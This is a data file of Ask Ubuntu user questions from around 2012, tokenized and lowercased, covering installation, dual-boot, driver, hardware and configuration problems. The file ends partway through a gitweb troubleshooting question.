133440	thunderbird cpu usage	is there any reason that thunderbird uses 18-30 % of my cpu constantly . this normally would n't be a problem but i like to leave it open so i am notified about my emails and this means the processor in my laptop ( core2duo 2.0ghz ) does n't seem to clock down making my laptop get marginally warm and also reducing battery life . if anyone knows the reason for this or how to stop it please let me know ! p.s . this only occurs when i leave the thunderbird windows open , but why ?
133443	not able to use scan functionality of samsung scx 3200 series mfp [ 12.04 ]	i was able to scan in 11.10 thanks to this thread here- how do i get a samsung scx3200 multifunction printer/scanner working ? but ever since i have installed a fresh version of 12.04 , there has been no detection of scanner . kindly help me with the issue . thanks in advance : )
133448	how obtain error message when exporting data from libreoffice base to calc and freezing occurs ?	[ ubuntu 12.04 ] when exporting large ( 100 mb ) data from a table in libreoffice 3.5.2.2 base embedded hsqldb to a calc spreadsheet using the procedure outlined in libreoffice help , libreoffice base and calc freeze after ~14 min . i can move the cursor though . the same process with a small table ( ~10 kb ) works all right . how to obtain an error message ? is it really necessary to install the deb program package libreoffice-dbg and using gdb or strace ?
133451	installed 12.04 and my head set mic is not recognized	the mic was recognized in the earlier version and i was able to use it . but after the upgrade , i have not been able to use my head set mic . i went to the sound settings for input and it is not listed there . the head set is listed in output .
133453	hplip gui and vpnc on lubuntu	both of these questions are related to avoiding dependencies from other desktop environments . i 'm using a hp printer on lubuntu . i installed hplip from synaptic without the gui on my notebook and with the gui on my desktop . i think the gui is qt-based . is it recommended to install the gui when running a non-qt desktop environment like lxde ? does it provide any additional functionality like a resume-function when the printer runs out of paper ? i 've used vpnc on ubuntu to access university vpn-network . is it recommended using the same packages on lubuntu ? i think there 's a kde version called kvpnc .
133456	can i uninstall and reinstall ubuntu software center ?	since migrating to a true install and upgrading to 12.04 i have had several problems that seem to relate to the ubuntu software center . hanging at applying changes and blank screen on screen lock only when it is running , for instance . my question is : can i safely uninstall and reinstall ubuntu software center and could this possibly fix those problems or are they just bugs i have to wait for updates for ?
133457	facebook.com redirecting to searchmagnified.com	please need urgent help.i 'm on ubuntu 12.04 and using chromium browser latest build.when ever i go for facebook.com on my browser it redirecting me to searchmagnified.com . this issue is found only in google chrome browser . any fix ?
133462	odt file support on the iphone app ?	i noticed that only doc and docx files can be viewed in the ubuntu one app for the iphone . is there are plans to support odt files ? i like to use the default libreoffice file structure . i bet many ubuntu users feel the same . thanks
133467	ubuntu 12.04 boot hangs with a black screen before grub menu after upgrade ( gma500_gfx driver )	i am using ubuntu on a fit-pc2 specifications and after upgrading from 10.04 to 12.04 i get a black screen at boot time ( before displaying the grub menu ) and the computer hangs with no disk activity . i have managed to boot ubuntu 12.04 on a live usb key but had to add the following boot options to do so : console=tty1 or console=text acpi=off noapic nomodeset using boot-repair , i have tried to add these options to /etc/default/grub ( see this pastie log for instance ) but i have n't been able to fix the black screen issue . i have tried many other things such as the workarounds mentioned on the web for psb-gfx_drivers without any success and also to uncomment grub_terminal=console with the result of getting a no video mode activated error . during these tests , i have managed to break /boot/grub/grub.cfg and could then hit grub in command line . this gave me the chance to check that i can boot without problem if i type : grub > set root= ( hd0,1 ) grub > linux /vmlinuz root=/dev/sda1 ro acpi=off noapic nomodeset console=tty1 grub > initrd /initrd.img grub > boot how can i tell grub to use these options ?
133468	will installing ubuntu from a cd delete my files ?	i am installing ubuntu 12.04 from a cd-rom . when i install , will the partition i give to ubuntu be formatted for ubuntu ? thanks ! i have windows 7 .
133476	usb hub card reader stopped working for virtualbox guest after 12.04 upgrade	i 'm using virtualbox-qt 4.1.12-dfsg-2 . this all worked fine in 11.10 . my hardware is a 2006 dell dimension 9200 , and the usb hub is a teac ca-200 . the user is in the vboxusers group . the guest is win xp , and apart from the card reader not working , the obvious symptom in device manager is `` this device can not start . ( code 10 ) '' . i 've tried reinstalling virtualbox , and rebooting host and guest . any ideas anyone ?
133478	`` session menu '' and `` me menu '' are missing after upgrade	after upgrading to ubuntu 12.04 , i 'm missing the `` session menu '' that lets me access system settings and shut down the computer , as well as the `` me menu '' . here 's a screenshot : how can i get them back ?
133479	unable to lock screen after upgrading to 12.04	after upgrading to 12.04 , i ca n't lock my screen anymore , has anyone encountered this and found a solution ? basically the keyboard shortcut does nothing and even if i select the lock option from the menu it still does n't do anything at all . at the moment i have to keep logging out everytime i leave my workstation . thanks in advanced . -- arvy
133483	compiz > ubuntu unity plugin > workspace switcher	i 'm using desktop switcher from the ubuntu unity plugin and easystroke to get the macbook pro feel with switching workspaces . everytime i use it to switch right or left a little animation like thing pops up as i 'm switching ( pic below ) . is there a way to remove the circled animation from popping up every time i use the switcher ? i can ignore it , but it would be nice to hide it some way . i 'm not very savvy with linux , but i will try to follow along as best i can . thanks !
133485	why is n't ubuntu installing on my asus eeepc 900a ?	i installed ubuntu on my asus eeepc 900a twice and it does n't boot . i even disabled all boot sources except the hard drive in bios .
133486	dual-boot ubuntu 12.04 from cd with windows 7 pre-installed ?	i bought this machine with windows 7 pre-installed ( only option ) and i 'm trying to install ubuntu 12.04 from cd . the system is set up , windows is running fine . so i put my ubuntu disc in the drive , and restart the computer . a purple screen shows up ( with a keyboard and figure at the bottom center ) briefly , and then the screen goes blank with a blinking cursor . no boot menu , nothing . i tried going into bios to see if boot from cd is enabled . i guess it is , because there is no button to enable or disable it . can someone point me to some instructions or offer some help ? i imagine i 'm not the only one with this problem , but i ca n't find anything . i do n't want to use wubi because i 'm going to be doing a lot of programming ( and testing for computation efficiency ) so i want a clean partition . thank you sincerely for any help .
133487	can not install anything through terminal - apt-get -f install	i get this when ever i try and install anything with th terminal : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gimp : depends : libgimp2.0 ( < = 2.6.12-z ) but 2.8.0-1ubuntu0ppa3~precise is to be installed depends : gimp-data ( < = 2.6.12-z ) but 2.8.0-1ubuntu0ppa3~precise is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i added myself to the root group in the grub recovery mode . then did sudo apt-get -f install and got this : errors were encountered while processing : /var/cache/apt/archives/gimp_2.8.0-1ubuntu0ppa3~precise_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
133496	installed precise on xp sp3 machine in a separate partition , on reboot system boots directly to xp , why ? how do i fix this ?	all other questions do n't seem to facing the exact same issue i am ( or i have n't worded it properly ) . like the title says : i have an xp sp3 system , i wanted to dual boot into ubuntu when needed . ubuntu is installed on a separate harddisk and partition than xp - i ca n't get the menu to let me choose which os to boot into . any help ?
133499	need net flix plugin so i can stream video with ubuntu 11.10 from nf account	is there a plug in that will replace silverlight so i can stream netflix ? thx-rn ubuntu 11.10 pentium ( r ) 4 4 cpu 3.40ghz x2 32 bit
133502	how to add sources in video lenses ?	im pretty new to ubuntu and was attracted to the idea on 12.04 of the video lenses where to searches bbc iplayer etc for videos yet in the 'sources ' tab i only seem to have 'my videos ' as the source . any help with how to add bbc iplayer etc.. ?
133503	sound logout ubuntu 12.04 & mac os 9 theme	it is possible for a script to shut down or log off , make a sound i want , such as windows 95 , millennium or 2000 even if it was possible with the new 11.10 but the 12.04 does not emit any sound at shutdown thanks and its system is much better than mac and virus ' windows ยกkeep it up ! one more thing . can i leave my system as mac os 9 is that strikes me mac os 9 . icons , sounds , gtk theme , all as mac os 9 please
133504	will ubuntu 12.04 's proprietary amd/ati driver be updated to 12.5 , 12.6 , etc . once released ?	i 've decided to install the proprietary amd/ati driver in ubuntu 12.04 repo , but before i do so , i 'd like to know : will ubuntu 12.04 's proprietary amd/ati driver be updated to 12.5 , 12.6 , etc . once amd releases them ? and if so , should i install `` fglrx '' or `` fglrx-updates '' ( i think this is the post release update ) one ? thanks
133505	ca n't install ubuntu	like the title says i have been at this all day . i have partitioned my disk to no avail . when i boot to ubuntu i get two options ( remove partitions on hard drive or something else ) i only get the third option , install along side windows , when i have my 16 gb usb inserted . i have a usb bootable on a 8gb and a dvd . when i elect `` something else '' i get options like dev\sda dev\sda1 1 mb ... sda2 250 gb ... sda3 219 gb ... sda4 32 gb i partitioned only 20 gb ! ! ! why is it not displayed by ubuntu ? then i bow down and use wubi to no avail . i have choosen all three options and each one has resulted in an error . i have no idea what to do ... any ideas ? i am running windows 7 premium and now have my hdd partitioned 4 ways . it did n't work with three either btw .
133506	dropbox gives an error message when starting up but then it disappears	something like `` can not monitor file system , run sudo tee 1000 | '' ... , but then it disappears before i can read the full message . dropbox seems to work ok so not sure what this is about ?
133513	tweaking remote control ( in-kernel lirc )	i 've recently rebuilt my mythtv box using mythbuntu 12.04 , to take advantage of newer hardware ( ivy bridge ) . on my previous build i used lirc to manage the remote , i.e . the mapping of key codes - > keypresses - > application keys ; it was quite a journey to learn it all , and i ended up fairly comfortable with how it all worked . what i have : i have a cheap chinavasion remote and usb dongle , which i 've found several articles on ; these largely revolve around working with xbmc ( interesting , but i do n't think directly applicable ) and also around getting a harmony remote to work ( it 's a chinavasion cvsb-983 - very useful , since i needed this to get my harmony 900 working ) . mythbuntu 12.04 64-bit mythtv 0.25 ( likely irrelevant ) how it is right now when i plug this in , it 'just works ' . which is great , except that ubuntu uses it natively , and prevents some of the button presses from getting through to myth . for example , i can send a button from the remote that equates to ctrl-alt-a ( which i assume ubuntu is n't interested in ) , and then trap that in mythfrontend , but the remote 's play button is caught by ubuntu ( which displays a large circle with a line though it , as there 's no media player loaded ) . i understand that this is because lirc is merged into the kernel now , and i like that . what i 've done so far : found the device using lsusb : $ lsusb bus 001 device 004 : id 073a:2230 chaplet systems , inc. infrared dongle for remote found the event device number : $ cat /proc/bus/input/devices i : bus=0003 vendor=073a product=2230 version=0110 n : name= '' hid 073a:2230 '' p : phys=usb-0000:00:1a.0-1.2/input0 s : sysfs=/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0/input/input5 u : uniq= h : handlers=sysrq kbd mouse1 event5 js0 b : prop=0 b : ev=10001f b : key=4c37fff072ff32d bf54445600000000 ffffffffff 30c100b17c007 ffa67bfad951dfff febeffdfffefffff fffffffffffffffe b : rel=343 b : abs=100030000 b : msc=10 tested the input with evtest ( i pressed play ) : $ sudo evtest /dev/input/event5 input driver version is 1.0.1 input device id : bus 0x3 vendor 0x73a product 0x2230 version 0x110 input device name : `` hid 073a:2230 '' supported events : event type 0 ( ev_syn ) event type 1 ( ev_key ) event code 1 ( key_esc ) event code 2 ( key_1 ) event code 3 ( key_2 ) event code 4 ( key_3 ) event code 5 ( key_4 ) event code 6 ( key_5 ) event code 7 ( key_6 ) < -- -- -- -- -- -- snipped lots of 'event code ' lines -- -- -- -- -- -- > testing ... ( interrupt to exit ) event : time 1336435683.230656 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1336435683.246648 , type 4 ( ev_msc ) , code 4 ( msc_scan ) , value c00cd event : time 1336435683.246652 , type 1 ( ev_key ) , code 164 ( key_playpause ) , value 0 event : time 1336435683.246655 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- tested showkey , again for the play key : $ sudo showkey -s kb mode was raw [ if you are trying this under x , it might not work since the x server is also reading /dev/console ] press any key ( program terminates 10s after last keypress ) ... 0xe0 0x22 0xe0 0xa2 what i want : i 'd like a way to scan the incoming button presses , if the above method is n't correct . i 'd like to either remap each button press to something that ubuntu/unity will ignore , or even better pass the keypress directly to myth ( i suspect this later is only possible with lirc , but i could be wrong ) . i would really like to do this with the in-kernel drivers , i.e . without explicitly loading lirc ; if that 's the way the world is going , i 'd rather find a way to map the current behaviour to what i want , rather than forcing the 'old ' arrangement of loading lirc outside the kernel . learning something new is also worthwhile ! my guess : i 'm assuming that this will require using setkeycodes , but have had trouble finding enough information to configure this . any help greatly appreciated !
133517	python gzip fails on ubuntu 11.04	this function is based on the python sample code @ http : //docs.python.org/library/gzip.html . it runs reliably on ubuntu 10.04 with its default python 2.6x . on ubuntu 11.04 , however , the code fails @ writelines ( ) . on one 11.04 machine , the failure message reported `` 'module ' object has no attribute 'bufferediobase ' '' . another 11.04 machine reported a different message `` no module named numpy '' . does anyone know of any missing python dependencies or other problems on 11.04 that would cause this ? def _compress ( inp , out ) : import gzip f_out = gzip.open ( out , 'wb ' ) f_in = open ( inp , 'rb ' ) f_out.writelines ( f_in ) f_out.close ( ) f_in.close ( ) os.unlink ( inp )
133519	external hard drives not detected	i am a novice user who upgraded to 11.10 . in my previous version of ubuntu , icons of my external drives ( 2 ) were visible and i could mount and navigate these drives . i can not locate my external hard drives with 11.10 . i have searched the questions with similar titles and have not found a solution . the command : sudo fdisk -l does list both external hard drives . how do i get icons of these drives to appear in my home folder ? i want to be able to navigate my external hard drive files by clicking on the icons and not using the terminal for navigation .
133530	how do i uninstall ubuntu 11.04 from my computer	i installed ubuntu 11.04 on my computer . it is the only operating system on my hard drive . i decided i want to use windows instead . but when i try to install windows 7 the install program says it does n't recognize the drive . how can i get ubuntu off of my drive so i can install windows 7 ? i tried booting up with the ubuntu install cd . this gives me a choice of installations . one of the choices is to delete the partition . but when i select that and then click forward it says that there is no boot sector and ca n't continue . please help !
133532	how to take a screenshot of chromium 's search suggestions and instant search results	i 've been trying to take screenshots of chromium 's google search suggestions as i type . i would also like to include google 's instant search results . i tried using the print screen key , and also ubuntu 's 12.04 gnome-screenshot utility . the issue is that when i press prtscr , focus is off chromium 's window , which causes it to automatically abort the search , and show the webpage that was on the screen when i started typing a new search . you can see in the screenshot below , that i typed www.askub , and google 's search suggestion was www.askubuntu , among other suggestions . an instant search result appeared that included this site as the first hit . but none of these things are in the screenshot .
133533	how to remove ubuntu and put windows back on ?	i have absolutely no experience with linux , and i desperately need to get my laptop back up and running again with windows . how do i remove ubuntu ?
133541	security issues from torrent downloading	i am a new ubuntu user ( using it since last 1 month ) . when i was with windows there were all these internet security suites that protected the pc . with ubuntu there are n't any . i wanted to know if i download torrents , will someone be able to hack into my system ? since all the peers can see my ip address , will they be able to break into my system ? i know the question sounds n00bish , but then i am a n00b . ps : ubuntu and transmission are all up to date in my system .
133557	ca n't edit file in emacs without sudo	i have lubuntu 12.04 , and i installed emacs using : sudo apt-get install emacs whenever i try to edit/make a file , however , nothing shows up unless i run it under sudo . so i need to type in sudo emacs `` filename '' everytime . can anyone help me out ? this is really annoying .
133559	what 's the meaning of `` action flag '' of a package ?	suppose the flag of a package is `` pi '' . i learnt that the `` i '' stands for `` i - the package will be installed . '' what 's the meaning of `` will be installed '' , please ?
133560	can my machine run ubuntu ( kubuntu | xubuntu | mint ) 12.04 well ?	i have a 9 year old computer packing the hardware listed below . my question is , can i run 12.04 ( ubuntu , kubuntu , mint or xubuntu ) well ? i was running ubuntu 10.10 and i upgraded to 12.04 by going through each release via the update manager : 11.04 - > 11.10 - > 12.04 during the installation process for 12.04 i saw an error message that there was an error installing and setting up part of the kernel . later , when i tried installing a package in synaptic , i got another error message mentioning the kernel . when i rebooted , i got told somehting about my video and graphics was not configured properly and that i would have to do it manually ( like i know ) . it gave me the option to enter the system in low graphics mode , but it just hanged . i had an old livecd of xubuntu 10.10 around so i used that to get into my computer and copy data over to an external hard drive . i think tried to install xubuntu 10.10 from the livecd , with the option `` download updates '' checked . the install process moved along a bit , then halted for about 5 hours . i rebooted my machine and tried the xubuntu 10.10 installer without the option to `` download updates '' . the install completed in about 15 minutes . so , all of that is making me wonder if there is someting about 12.04 that does not like my hardware . i 'm willing to try again , but only if i know i will not have to spend hours just to get to an error message and a hosed up system like i did last night . i also think i have a lot more ram than is being reported in the output below . i had extra ram installed last year . i 'm not good with the command line readouts , but there seems like there should be a lot more . i was n't thrilled with unity . i am willing to try kubuntu 12.04 . will i run into the same problems ? what is the highest version of a *ubuntu can i upgrade to ? thanks cpu model : intel ( r ) pentium ( r ) 4 cpu 2.53ghz frequency : 2533.223 mhz l2 cache : 512 kb bogomips : 5066.44 numbering : family ( 15 ) model ( 2 ) stepping ( 7 ) flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe up pebs bts cid ram ~ $ free -mt total used free shared buffers cached mem : 1506 891 615 0 91 521 -/+ buffers/cache : 278 1227 swap : 1609 0 1609 total : 3116 891 2225 video card 01:00.0 vga compatible controller : nvidia corporation nv18 [ geforce4 mx 440 agp 8x ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. v9180 magic flags : bus master , 66mhz , medium devsel , latency 32 , irq 16 memory at fd000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at f0000000 ( 32-bit , prefetchable ) [ size=64m ] expansion rom at fe9e0000 [ disabled ] [ size=128k ] kernel driver in use : nouveau kernel modules : nouveau , nvidiafb motherboard intel 845pe atx 533fsb ddr333 usb2
133561	why would screen brightness not adjust ofter closing laptop lid ?	brightness adjustment works until i close my laptop . after i close it once i can not adjust the brightness . i often restart the computer to be able to adjust again . the fn keys do not work . the brightness and lock settings do n't respond . there must be a better way . toshiba , portege . here is the etc/acpi/lid.sh read out . could i adjust it ? # ! /bin/bash # todo : change the above to /bin/sh test -f /usr/share/acpi-support/state-funcs || exit 0 . /usr/share/acpi-support/power-funcs . /usr/share/acpi-support/policy-funcs . /etc/default/acpi-support [ -x /etc/acpi/local/lid.sh.pre ] & & /etc/acpi/local/lid.sh.pre if [ `checkpolicy` = 0 ] ; then exit ; fi grep -q closed /proc/acpi/button/lid/*/state if [ $ ? = 0 ] then for x in /tmp/.x11-unix/* ; do displaynum=`echo $ x | sed s # /tmp/.x11-unix/x # # ` getxuser ; if [ x '' $ xauthority '' ! = x '' '' ] ; then export display= '' : $ displaynum '' . /usr/share/acpi-support/screenblank fi done else for x in /tmp/.x11-unix/* ; do displaynum=`echo $ x | sed s # /tmp/.x11-unix/x # # ` getxuser ; if [ x '' $ xauthority '' ! = x '' '' ] ; then export display= '' : $ displaynum '' grep -q off-line /proc/acpi/ac_adapter/*/state if [ $ ? = 1 ] then if pidof xscreensaver > /dev/null ; then su $ user -c `` xscreensaver-command -unthrottle '' fi fi if [ x $ radeon_light = xtrue ] ; then [ -x /usr/sbin/radeontool ] & & radeontool light on fi if [ `pidof xscreensaver` ] ; then su $ user -c `` xscreensaver-command -deactivate '' fi su $ user -c `` xset dpms force on '' fi done fi [ -x /etc/acpi/local/lid.sh.post ] & & /etc/acpi/local/lid.sh.post
133563	how to configure the xinput driver `` multitouch '' with absolute axes	i would like to use the multitouch xinput driver ( xserver-xorg-input-multitouch ) with absolute axes , but i could not find any man file . example : section `` inputclass '' identifier `` egalax virtual class '' matchproduct `` egalaxtouch virtual device '' matchdevicepath `` /dev/input/event* '' **driver `` multitouch '' option `` ignorerelativeaxes '' `` true '' ** endsection
133564	when will the api/x11 be completed ?	okay , before i get into the guts of it , i 'm vastly aware that gtk and qt are marvelous frameworks from which to work with . in fact , i have no qualms with either . that being said , does anyone know of any ongoing projects by which x11/xlib are to be completed libraries ? sadly , i ask this is a former windows-only developer . in win32 api , everything from the basic window to dialog boxes are covered in same api level . whereas , under linux basic windows , anti-alias fonts , hardware interaction are all independent libraries . dialog boxes are still , by and large , self constructed . and if there are no projects looking to complete x11 , does anyone know of any resources by which a person could understand the fundamentals to embark on such a project ?
133565	'cloning ' ubuntu to my other pc ?	i searched here and see mention of clonezilla and remastersys - but nothing i found answered my question completely , so i ask : my home pc is just a generic one , and now that i changed it to ubuntu i really love how it 's come out and how it runs better ! my office pc is a different generic set of hardware , and i 'd like to 'clone ' the exact same setup to it but not have to repeat all the tweaking and such that i did already . is there a program that will allow me to replicate/install my already customized setup from one to the other , easily ? are there certain steps i must make before doing something like that so it 'll be compatible with different hardware ? thanks !
133566	wireless network can not be enabled for sony vaio e series	i can not use the wireless network from my sony vaio e series laptop . my os is ubuntu 12.04 . please help .
133569	wubi install : choosing windows at boot menu does not work	i 'm not very good with computers . the thing is that i had a dual boot ( win 7 and ubuntu 11. something ) installed with wubi for a long time and it worked perfectly . now the problem is that i updated ubuntu to 12.04 lts and i can only work with ubuntu . when restarting the computer i can see the boot options ( win 7 and ubuntu ) but if i choose to boot win 7 , it begins to load and then it restarts . what can i do ? i use a dell 1520 vostro . thanks in advance .
133573	is there a way to get a kindle fire to work with 12.04 ?	my mom is getting a kindle fire , and she uses ubuntu 12.04 32-bit . i need to find a program to have her kindle working with her ubuntu machine . i would really hate it if we could n't find an app for it . thanks for any help ! !
133575	hdmi audio stops after tv turned off	after the 12.04 update my hdmi audio stops working anytime i turn off my 2nd monitor ( plasma tv ) . graphics card is a radeon 6800 which has dvi out to 1st monitor , hdmi out to receiver which the tv gets it 's audio/video . audio is always via my receiver sound . things work fine as long as it boots with the tv and receiver on . turn off the tv and bart 's hdmi audio will go away , and the hdmi option vanishes from the sound menu . i had an occasional hdmi issue with 11.10 but turning on/off the tv would fix the sound . how can i hardcode things so that it always uses hdmi out of audio ? i suspect the tv is sending a signal upon that 12.04 is now listening for . turning the tv back on does not resolve this , and i 'd suggest having the ability to override this new `` feature '' via sound menu .
133580	my pc has both windows xp and windows 8 installed . if i use wubi to install ubuntu , where should i run the wubi installer ? xp or win8 ?	i have decided to give ubuntu a try using wubi , but i do n't know how this will work on my dual-booted pc . i currently have windows xp and windows 8 consumer preview installed . i went to the ubuntu site and i saw that you can install ubuntu inside windows using wubi , the ubuntu windows installer . my question is where should i run the wubi installer ? in windows xp or in windows 8 ? i am using the windows 8 bootloader . will ubuntu show up in it ? will this actually work ? i am new to ubuntu but i really want to give it a try . please help ! thanks in advance . : )
133585	how do i automatically backup mysql-cluster database ?	i need to automatically and frequently backup mysql-cluster databases . how can i do this ?
133591	does updating the os on one partition affect other partitions ?	i have one partition with ubuntu 9.10 , and another with windows vista . i am trying to upgrade ubuntu to 12.04 since 9.10 is no longer supported . i understand i need to do a fresh install with a disc ( rather than just updating from synaptic , since it 's such a big jump ) . when i do this , will my data on the windows partition be affected ? i do n't have much space to back things up , so i thought i 'd just move any unbacked-up data from the ubuntu partition onto the windows partition . then , i 'll wipe the ubuntu partition and install 12.04 on it . is this a bad idea ?
133595	need java for browser	i was surfing this site and it said i need java installed . when i searched a bit , i found three java type ( ? ) . open jdk , sun java and oracle . i want to know the difference among them . i need java for surfing the internet only , the type of sites that require java . i tried to install sun java but could n't . which should i install & how ? if it 's sun java could you please suggest another method to install ? i 'm running ubuntu 12.04 64-bit .
133597	reveal file in file explorer	i have a java application in which i need to `` reveal '' a file to the user ( i.e . open the containing folder of the file in an explorer and highlight the file ) . i have configured it to do so in both windows and mac osx , but i have not been able to find a terminal command to do so on linux/ubuntu operating systems . the below batch/terminal commands are the windows and mac equivalents of what i am looking for . windows : explorer /select , filename mac : open -r filename
133602	error trying to run gccg while loading shared libraries : libjpeg.so.62 : can not open shared object file	i 'm trying to run gccg ( a multiplatform implementation of a card game engine ) on my ubuntu 12.04 x86_64 , but i always get the following error : ./ccg_client : error while loading shared libraries : libjpeg.so.62 : can not open shared object file : no such file or directory of course i thought the library was missed and i tried to install using apt-get , but i realized it was already installed . when i use $ locate -i libjpeg this is what i get : /usr/lib/i386-linux-gnu/libjpeg.so.8 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2 /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/amd64/libjpeg.so /usr/lib/x86_64-linux-gnu/libjpeg.so.62 /usr/lib/x86_64-linux-gnu/libjpeg.so.62.0.0 /usr/lib/x86_64-linux-gnu/libjpeg.so.8 /usr/lib/x86_64-linux-gnu/libjpeg.so.8.0.2 /usr/share/doc/libjpeg-turbo8 /usr/share/doc/libjpeg62 /usr/share/doc/libjpeg8 /usr/share/doc/libjpeg-turbo8/changelog.debian.gz /usr/share/doc/libjpeg-turbo8/copyright /usr/share/doc/libjpeg62/readme.gz /usr/share/doc/libjpeg62/changelog.debian.gz /usr/share/doc/libjpeg62/copyright /usr/share/doc/libjpeg8/changelog.debian.gz /usr/share/doc/libjpeg8/copyright /usr/share/lintian/overrides/libjpeg-turbo8 /var/lib/dpkg/info/libjpeg-turbo8 : amd64.list /var/lib/dpkg/info/libjpeg-turbo8 : amd64.md5sums /var/lib/dpkg/info/libjpeg-turbo8 : amd64.postinst /var/lib/dpkg/info/libjpeg-turbo8 : amd64.postrm /var/lib/dpkg/info/libjpeg-turbo8 : amd64.shlibs /var/lib/dpkg/info/libjpeg-turbo8 : amd64.symbols /var/lib/dpkg/info/libjpeg-turbo8 : i386.list /var/lib/dpkg/info/libjpeg-turbo8 : i386.md5sums /var/lib/dpkg/info/libjpeg-turbo8 : i386.postinst /var/lib/dpkg/info/libjpeg-turbo8 : i386.postrm /var/lib/dpkg/info/libjpeg-turbo8 : i386.shlibs /var/lib/dpkg/info/libjpeg-turbo8 : i386.symbols /var/lib/dpkg/info/libjpeg62 : amd64.list /var/lib/dpkg/info/libjpeg62 : amd64.md5sums /var/lib/dpkg/info/libjpeg62 : amd64.postinst /var/lib/dpkg/info/libjpeg62 : amd64.shlibs /var/lib/dpkg/info/libjpeg8 : amd64.list /var/lib/dpkg/info/libjpeg8 : amd64.md5sums /var/lib/dpkg/info/libjpeg8 : i386.list /var/lib/dpkg/info/libjpeg8 : i386.md5sums any idea of what is going bad ? thanks in advance !
133608	how do i get a dell latitude e6420 working ?	i 've just installed ubuntu 12.04 ( 64-bit ) on a brand new dell latitude e6420 , and i 'm having a few problems . this laptop has an optimus ( ? ) setup - i.e . integrated gfx and an nvidia quadro nvs 4200m . first problem - i ran setup , etc , and discovered that i can only run unity2d - if i try and login with unity3d , it just defaults to 2d . this is with nvidia-current installed ( 302.07 ) . note also that i ca n't run nvidia-settings ( `` you do not appear to be using the nvidia x driver . `` ) , and there is no additional drivers found ( `` no proprietary drivers are in use on this system '' ) . i tried to troubleshoot this , and removed nvidia , leaving ( i guess ) just nouveau drivers - in that case , unity3d did work , but i was stuck with the open source nouveau drivers powering the integrated graphics . so , obviously , i want to run unity3d , and be using the more powerful nvidia graphics card . i 've tried a bit of tinkering around , but i 'm not sure the best way to proceed , or perhaps more importantly , i 'm not sure of what the best final solution might be . i 've heard about bumblebee - but frankly , i would prefer to have the proprietary nvidia drivers working properly . any help would be much appreciated !
133611	how do i slow down my wireless mouse ?	i set the pointer speed in system setting as low as possible and it is still way too fast . it is a logitech m185 and i am running ubuntu 12.04 . i have the same mouse with my mac mini and it is n't crazy fast like the one on my ubuntu computer .
133617	ubuntu installation from windows installer failed	i tried installing ubuntu through the windows installer provided so that i can have a dual boot system ( windows as well as ubuntu ) . i changed the drive to e as windows system files were in c. but the installation failed due to an exception with the following message : exception : could not retrieve the required disk image files
133618	ubuntu 12.04 questionable ram usage , mouse lags , windows fade slowly and programs hang ... after a few hours things return to normal	i am running 12.04 on a core 2 duo t8100 at 2.10ghz with intel gm965/gl960 integrated mobile graphics with shared memory . i have 3gigs of ram but it normally stays below 1 gig . super key hangs and programs hang when few programs are open . with many programs and tabs open , windows fade ( almost ) properly and nothing seems to hang , but typing and mouse gestures still lag , though not quite as bad . ram usage increases to approx 2 gig , still no swap . boots rather slowly and crypto swap hangs , but i kind of expect that with a 5400rpm drive , should i not ? i was assuming this is a graphics related problem so i ran unity_support and all questions were answered with a 'yes . ' i also installed the updated drivers from the ubuntu x team ppa ( after confirming its validity , of course ) . i checked the minimum requirements and all are met a bit better than stated ( i think ) . also , 2d has the same issues ( so not a compositing issue , right ? ) . i also installed mesa-utils and upgraded , updated and restarted . no help , but instead of `` graphics unknown '' in system monitor , there simply is no field for graphics . libgl gives a `` no such file or directory '' error when searching for the driver , but i am not sure how to read that file , posted below . sorry to be so long , just trying to provide all the info i can . also , this problems seems to go away after the pc is left on for some time ( hours or overnight ) only to reappear on restart . lspci is http : //paste.ubuntu.com/975031/ libgl verbose is http : //paste.ubuntu.com/975013/ latest xorg log is http : //paste.ubuntu.com/975020/ var/log/syslog from this session is http : //paste.ubuntu.com/975036/ edit : this is a clean install and i did not have this problem upon intitial install or with live usb . already turned off all sync programs . also have preload installed . possibly related to bug here . if you can confirm that this is related to said bug , please feel free to close the question with the appropriate comment . if you have found this post and you have intel 965gm please follow link and click `` this also affects me ''
133622	how do i fix problem with ubuntu 11.10 server and gitweb ?	hi and sorry for bad english first : ( ... i have one ubuntu 11.10 server and i wan na make gitweb server . i refered to this site - http : //www.snowfrog.net/2011/08/02/setting-up-gitweb-on-your-ubuntu-workstation/ . so , i tried to install gitweb and restart apache server . ( as root account ) $ apt-get install gitweb $ service apache2 restart and i tried to connect my gitweb server , but i ca n't connect - internal server error . i was searching for a lot of time and tried to solve this problem , i coud n't . this is my gitweb and my server infomation - installed 'mediawiki ' and working now . installed 'apache2 ' and working too . git is working too . i tried to clone git repo to my desktop , and success connected . installed 'gitweb ' and ... not working . - internal server error . i checked my apache2 log . [ error ] [ client -- -. -- -. -- -. -- - ] ( 13 ) permission denied : exec of '/usr/share/gitweb/index.cgi ' failed [ error ] [ client -- -. -- -. -- -. -- - ] premature end of script headers : index.cgi gitweb was installed to /usr/share/gitweb . this is permission for /usr/share/gitweb forlder . -rwxr-xr -- 1 root root 221331 2012-05-08 02:24 gitweb.cgi lrwxrwxrwx 1 root root 10 2011-06-11 18:17 index.cgi - > gitweb.cgi drwxrwxrwx 2 root root 4096 2012-05-07 19:36 static this is result to 'perl /usr/share/index.cgi ' . status : 404 not found^m content-type : text/html ; charset=utf-8^m ^m < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype html public `` -//w3c//dtd xhtml 1.0 strict//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtml1-strict.dtd '' > < html xmlns= '' http : //www.w3.org/1999/xhtml '' xml : lang= '' en-us '' lang= '' en-us '' > < ! -- git web interface version 1.7.5.4 , ( c ) 2005-2006 , kay sievers < kay.sievers @ vrfy.org > , christian gierke -- > < ! -- git core binaries version 1.7.5.4 -- > < head > < meta http-equiv= '' content-type '' content= '' text/html ; charset=utf-8 '' / > < meta name= '' 